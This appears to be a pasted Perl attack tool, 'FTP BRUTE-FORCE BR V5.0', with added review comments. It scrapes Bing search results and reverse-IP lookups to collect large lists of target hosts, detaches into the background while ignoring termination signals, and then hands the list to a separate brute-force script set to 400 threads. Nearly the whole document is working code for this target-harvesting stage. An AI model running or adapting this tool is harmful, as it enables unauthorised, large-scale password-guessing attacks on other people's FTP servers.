vlpriv8

FTP BRUTE-FORCE BR V5.0

Aug 24th, 2015
  1. #!/usr/bin/perl
  2.  
  3. # FTP BRUTE-FORCE BR V5.0
  4. # irc.priv8.jp #priv8
  5.  
  6. use threads;
  7. use threads::shared;
  8. use Thread::Queue;
  9. use Thread::Semaphore;
  10. use HTTP::Headers;
  11. use HTTP::Request;
  12. use HTTP::Response;
  13. use LWP::UserAgent;
  14. use HTTP::Cookies;
  15. use Socket;
  16.  
  17.  
  18.  
  # Usage gate: both <wordlist> and <threads> must be present. A thread count
  # of 0 is false in Perl and is therefore treated like a missing argument.
  unless ($ARGV[1]) {
      print "Modo de uso:\nperl $0 <wordlist> <threads>\n";
      exit();
  }

  # Background the process: INT/HUP/TERM/CHLD are ignored and the parent exits
  # right after fork, so only the child continues. For an analyst this means
  # the script keeps running after the launching shell goes away and does not
  # react to a plain SIGTERM.
  @SIG{ "INT", "HUP", "TERM", "CHLD" } = ("IGNORE") x 4;
  my $pid = fork;
  exit if $pid;
  die "Problema com o fork: $!" unless defined($pid);

  $| = 1;      # unbuffered STDOUT so the "\r" progress line is shown immediately
  sleep(4);

  # Shared state. $q, $semaphore, $max_threads and $xs are read by the subs
  # defined further down in this file.
  my $q           = Thread::Queue->new();
  my $semaphore   = Thread::Semaphore->new();
  my $word        = $ARGV[0];     # path of the search-term list
  my $max_threads = $ARGV[1];     # upper bound on worker threads per phase
  my @wordlist    = ();
  my $arq;                        # file handle reused for every open below
  my $conta_linha = 0;            # line / unique-host counter
  my %rep         = ();           # set of hosts already seen (de-duplication)

  our $xs : shared = 0;           # hosts collected so far, shared across threads

  # Phase 1: read the search terms, one per line.
  # NOTE(review): two-argument open; the path comes straight from @ARGV.
  print "[+] Loading wordlist, please wait\n";

  open($arq, "<$word") or die "$!\n";
  @wordlist = <$arq>;
  chomp @wordlist;
  $conta_linha = scalar @wordlist;
  close($arq);
  print "[+] Foram carregadas $conta_linha palavras.\n[+] Iniciando buscas...\n";

  # Phase 2: run the "search" workers over the terms; they append hosts to
  # sites.txt in the current working directory.
  &threadnize("search", @wordlist);

  # Phase 3: de-duplicate sites.txt in place.
  print "\n[+] Removendo sites repetidos\n";
  $conta_linha = 0;
  open($arq, "<sites.txt") or die "$!\n";
  while (my $linha = <$arq>) {
      chomp $linha;
      next if $rep{$linha};
      $rep{$linha} = 1;
      $conta_linha++;
  }
  close($arq);

  open($arq, ">sites.txt") or die "$!\n";
  print {$arq} $_ . "\n" for keys %rep;
  close($arq);

  # Phase 4: reload the unique hosts and hand them to the "dns" workers, which
  # resolve each one and look up more hosts via an "ip:" search.
  $conta_linha = 0;
  my @wordlist2 = ();
  print "[+] Carregando lista de sites para resolver ip e buscar mais dominios\n";
  open($arq, "<sites.txt") or die "$!\n";
  @wordlist2 = <$arq>;
  chomp @wordlist2;
  close($arq);
  $xs = 0;

  &threadnize("dns", @wordlist2);

  # Phase 5: de-duplicate again; this count is the one reported below.
  print "\n[+] Removendo sites repetidos\n";
  %rep = ();
  open($arq, "<sites.txt") or die "$!\n";
  while (my $linha = <$arq>) {
      chomp $linha;
      next if $rep{$linha};
      $rep{$linha} = 1;
      $conta_linha++;
  }
  close($arq);

  open($arq, ">sites.txt") or die "$!\n";
  print {$arq} $_ . "\n" for keys %rep;
  close($arq);

  # Phase 6: hand sites.txt to a second script. scan.pl is not part of this
  # listing; the thread count passed to it is the literal 400, not $max_threads.
  print "[+] Total de sites encontrados: $conta_linha\n";
  print "[+] iniciando bruteforce com 400 threads\n";
  system("perl scan.pl sites.txt 400");
  122.  
  123.  
  124.  
  125.  
  126.  
  127.  
  128.  
  129. ######################### SUBS #################################
  130.  
  131.  
  # Thread worker for the search phase: drains the shared queue and runs one
  # paged Bing query per dequeued term. The per-term work is the same sequence
  # of steps that search2() performs, so it is delegated there.
  sub search(){
      while ($q->pending() > 0) {
          # The semaphore (created with the default count) serialises dequeue
          # across the worker threads.
          $semaphore->down();
          my $search = $q->dequeue;
          $semaphore->up();
          next unless defined $search;

          &search2($search);
      }

  }
  174.  
  175.  
  176.  
  177.  
  178.  
  # Runs one Bing query and appends every hostname-looking <cite> value found
  # in the result pages to sites.txt.
  #
  # Argument: the query string, concatenated into the URL as-is (no escaping).
  # Side effects: bumps the shared counter $xs once per unique host, appends to
  # sites.txt and prints a progress line, the last three under the semaphore.
  sub search2(){
      my ($search) = @_;
      my %sites = ();
      my $response;

      # $y bounds the "first=" paging offset. It starts at 701 and is
      # re-derived after every page from the highest page number that
      # getmax() finds in the response.
      my $y = 701;
      my $x = 0;
      while ($x <= $y) {
          my $bing = 'http://www.bing.com/search?q='.$search.'&first='.$x.'&FORM=PORE';
          $response = &GET($bing);

          while ($response =~ m/<cite>(.*?)<\/cite>/g) {
              my $site = $1;
              $site =~ s/<strong>|<\/strong>//g;

              # Keep only what precedes the first slash (host part).
              my $slash = index($site, '/');
              $site = substr($site, 0, $slash) if $slash >= 0;

              next if $sites{$site};
              next unless $site =~ /^[a-zA-Z0-9\.\-]+$/;
              $sites{$site} = 1;
          }

          $y = 10 * &getmax($response) + 1;
          $x += 10;
      }

      # One counter increment per unique host, each under the semaphore.
      my @found = keys %sites;
      foreach my $host (@found) {
          $semaphore->down();
          $xs++;
          $semaphore->up();
      }
      my $si = join("", map { $_ . "\n" } @found);

      # Append and progress output happen under the semaphore.
      # The open is unchecked, exactly as in the original.
      my $out;
      $semaphore->down();
      open($out, ">>sites.txt");
      print $out $si;
      close($out);
      print "[+] sites encontrados: [$xs] buscas restantes [". $q->pending ."] \r";
      $semaphore->up();
  }
  213.  
  214.  
  215.  
  216.  
  217.  
  218.  
  219.  
  # Returns the number captured by the last pagination-link match in $content,
  # or 0 when no such link is present. Callers pass whatever GET() returned, so
  # $content may also be a status code or the string "error".
  sub getmax(){
      my ($content) = @_;

      # In list context a /g match with one capture group yields every capture.
      my @pages = $content =~ m/<li><a href="\/search\?q=.+">(\d+)<\/a><\/li>/g;

      return @pages ? $pages[-1] : 0;
  }
  228.  
  229.  
  230.  
  # Fills the shared queue with @tests and runs the sub named by $fun in up to
  # $max_threads threads, then waits for all of them.
  #
  # $fun is a sub *name*; it is resolved through a symbolic reference, which is
  # why strict refs is switched off around the thread creation.
  sub threadnize(){
      my ($fun, @tests) = @_;
      @_ = ();

      # Items that are false in Perl ("", "0", undef) are skipped.
      for my $item (@tests) {
          next unless $item;
          $q->enqueue($item);
      }

      my @threads = ();
      my $spawned = 0;
      until ($q->pending() <= 0 || $spawned > $max_threads - 1) {
          no strict 'refs';
          my $worker = threads->new(\&{$fun});
          push @threads, $worker;
          $spawned++;
      }

      sleep(2);
      $_->join() for @threads;
      @threads = ();
  }
  251.  
  252.  
  253.  
  # Fetches $url1 with LWP and returns:
  #   0             when the URL is empty/false or does not start with http(s)://
  #   decoded body  on a successful response
  #   "error"       on HTTP 404
  #   status code   for every other response
  #
  # Fixed request properties visible on the wire: the Chrome/16 User-Agent
  # string below and the Accept / Accept-Language / Accept-Encoding /
  # Connection / Keep-Alive header values.
  sub GET(){
      my ($url1) = @_;
      return 0 unless $url1;
      return 0 unless $url1 =~ /^https?:\/\//;

      my $headers = HTTP::Headers->new();
      $headers->remove_header('Connection');
      my @fields = (
          'Accept'          => "text/html, application/xhtml+xml, application/xml",
          'Accept-Language' => "en-US,en",
          'Accept-Encoding' => "gzip, deflate",
          'Connection'      => "Keep-alive",
          'Keep-Alive'      => 30,
      );
      $headers->header(@fields);

      my $req = HTTP::Request->new('GET', $url1, $headers);

      # NOTE(review): verify_hostname => 0 switches off TLS hostname checking.
      # protocols_allowed below lists only 'http', so https URLs pass the
      # prefix check above but are not among the allowed schemes.
      my $ua = LWP::UserAgent->new(
          agent    => "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7",
          ssl_opts => { verify_hostname => 0 },
      );

      $ua->timeout(15);
      $ua->max_size(1024000);
      $ua->protocols_allowed( [ 'http' ] );

      my $response = $ua->request($req);
      my $code     = $response->code;

      return $response->decoded_content if $response->is_success;
      return "error" if $code == 404;
      return $code;

  }
  285.  
  286.  
  287.  
  # Thread worker for the DNS phase: takes hostnames off the shared queue,
  # resolves each with gethostbyname and, when the result looks like a dotted
  # quad, passes "ip:<address>" to search2().
  sub dns(){
      while ($q->pending() > 0) {
          # Dequeue is serialised through the semaphore.
          $semaphore->down();
          my $url = $q->dequeue;
          $semaphore->up();

          # Element 4 of gethostbyname's return list is the first packed
          # address; the four bytes are unpacked and joined with dots. The
          # slice is kept inline so unpack sees the same argument list as in
          # the original when resolution fails.
          my @octets = unpack("C4", (gethostbyname($url))[4]);
          my $ip     = join(".", @octets);

          # join always returns a defined string, so the defined() test only
          # mirrors the original; the length and pattern checks are what
          # filter out failed lookups.
          next unless defined($ip);
          next unless length($ip) > 6 && $ip =~ /^\d+\.\d+\.\d+\.\d+$/;

          &search2("ip:$ip");
      }
  }